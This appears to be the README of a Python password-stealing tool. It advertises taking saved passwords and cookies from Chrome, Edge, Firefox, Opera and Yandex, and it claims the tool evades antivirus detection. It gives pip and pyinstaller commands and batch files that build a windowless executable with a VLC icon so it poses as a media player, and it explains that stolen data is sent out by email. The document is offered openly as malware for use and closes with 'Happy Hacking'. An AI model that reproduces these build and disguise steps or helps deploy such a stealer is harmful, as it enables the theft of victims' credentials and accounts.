Python steal chrome password all version are supported FUD 100 %
receive data by email
download and install Python > 3.0
after install Python :
simple installation dependances :
test steal password with local script
run " build_local.bat "
build_local.bat will download and install depandances after he will build your .exe with icon vlc
put your gmail email (and password ), email sender
run build_email.bat : will download and install depandances after he will build your .exe with icon vlc
Manuel installation
open your cmd and install Dependencies
pip install pywin32
pip install Pillow
pip install requests
pip install cryptography
pip install pyinstaller
- to build with .exe ,run :
pyinstaller -F -w
- Version Professionel ( another script 100 % fud )
Stealing passwords and cookies from web browsers
- Chrome
- Microsoft Edge
- Firefox
- Opera
- yandex
Demo Youtube (simple installation )
Demo Youtube (password and cookie )
demo Facebook( manuel installation )
other similar project ( 2021 )
Happy Hacking